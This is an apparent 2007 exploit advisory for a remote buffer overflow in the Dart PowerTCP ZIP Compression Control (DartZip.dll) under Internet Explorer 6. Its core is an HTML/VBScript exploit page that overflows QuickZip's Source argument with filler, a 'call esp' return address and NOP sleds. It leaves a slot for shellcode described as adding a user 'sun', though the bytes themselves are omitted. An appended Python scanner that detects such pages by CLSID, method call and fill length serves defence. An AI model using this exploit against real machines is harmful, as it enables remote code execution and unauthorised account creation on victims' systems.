Related information

  Dart Communications PowerTCP ActiveX buffer overflow

  Dart Communications PowerTCP Service Control (DartService.dll 3.1.3.3) remote buffer overflow

From: retrog_(at)_alice.it <retrog_(at)_alice.it>
Date: 26.05.2007
Subject: IE 6 / Dart Communications PowerTCP ZIP Compression Control (DartZip.dll 1.8.5.3) remote buffer overflow

<!--
IE 6 / Dart Communications PowerTCP ZIP Compression Control (DartZip.dll 1.8.5.3) remote
buffer overflow exploit / xp sp2 it
by rgod
site: retrogod.altervista.org
software site: www.dart.com
-->
<html>
<object classid='clsid:42BA826E-F8D8-4D8D-8C05-14ABCE99D4DD' id='DartZip'></object>
<script language='vbscript'>

'metasploit one, add a user 'sun' with pass 'tzu'
shellcode = unescape("") 'encoded payload bytes omitted

EIP = unescape("%67%31%41%7e") 'call esp user32.dll

Source=String(1024, "A") + EIP + String(36, unescape("%90")) + shellcode  + String(24, unescape("%90"))
Destination="default"
IncludeSubs=True
PreservePath=True
Password="default"
Encryption=1

DartZip.QuickZip Source ,Destination ,IncludeSubs ,PreservePath ,Password ,Encryption

</script>
</html>


original url: http://retrogod.altervista.org/ie_DartZip_bof.html
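
For triage of web or mail content, the following added example (not part of the original advisory) flags HTML that instantiates the DartZip control by the CLSID shown above, calls its QuickZip method, and builds an oversized filler string. The `scan` function, the `MAX_FILL` threshold and the sample page are assumptions constructed for illustration.

```python
import re
from html.parser import HTMLParser

# CLSID copied from the <object> tag in the advisory above.
DARTZIP_CLSID = "42ba826e-f8d8-4d8d-8c05-14abce99d4dd"
MAX_FILL = 260  # assumed threshold (Windows MAX_PATH), not a vendor-stated limit

class ObjectFinder(HTMLParser):
    """Collects ids of DartZip <object> tags and the text of all scripts."""
    def __init__(self):
        super().__init__()
        self.ids, self.scripts, self.in_script = [], [], False

    def handle_starttag(self, tag, attrs):
        self.in_script = tag == "script"
        if tag == "object":
            a = dict(attrs)
            clsid = (a.get("classid") or "").lower().replace("clsid:", "")
            if clsid.strip("{} ") == DARTZIP_CLSID:
                self.ids.append(a.get("id") or "")

    def handle_endtag(self, tag):
        if tag == "script":
            self.in_script = False

    def handle_data(self, data):
        if self.in_script:
            self.scripts.append(data)

def scan(html):
    """Return a list of findings for one HTML document (empty if clean)."""
    f = ObjectFinder()
    f.feed(html)
    f.close()
    script, findings = "\n".join(f.scripts), []
    for oid in f.ids:
        findings.append(f"DartZip control instantiated (id={oid!r})")
        if oid and re.search(rf"\b{re.escape(oid)}\s*\.\s*QuickZip\b", script, re.I):
            findings.append(f"script calls {oid}.QuickZip")
    if f.ids:  # only inspect string fills on pages that load the control
        for m in re.finditer(r"\bString\s*\(\s*(\d+)\s*,", script, re.I):
            if int(m.group(1)) > MAX_FILL:
                findings.append(f"String({m.group(1)}, ...) fill exceeds {MAX_FILL}")
    return findings

# Constructed sample with no payload: same control and call, oversized fill only.
SAMPLE = """<object classid='CLSID:{42BA826E-F8D8-4D8D-8C05-14ABCE99D4DD}' id='z'></object>
<script language='vbscript'>
z.QuickZip String(4096, "A"), "out", True, True, "pw", 1
</script>"""
```

The scanner only sees controls created through an `<object>` tag; script-side instantiation by ProgID is not covered because the advisory does not give one.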
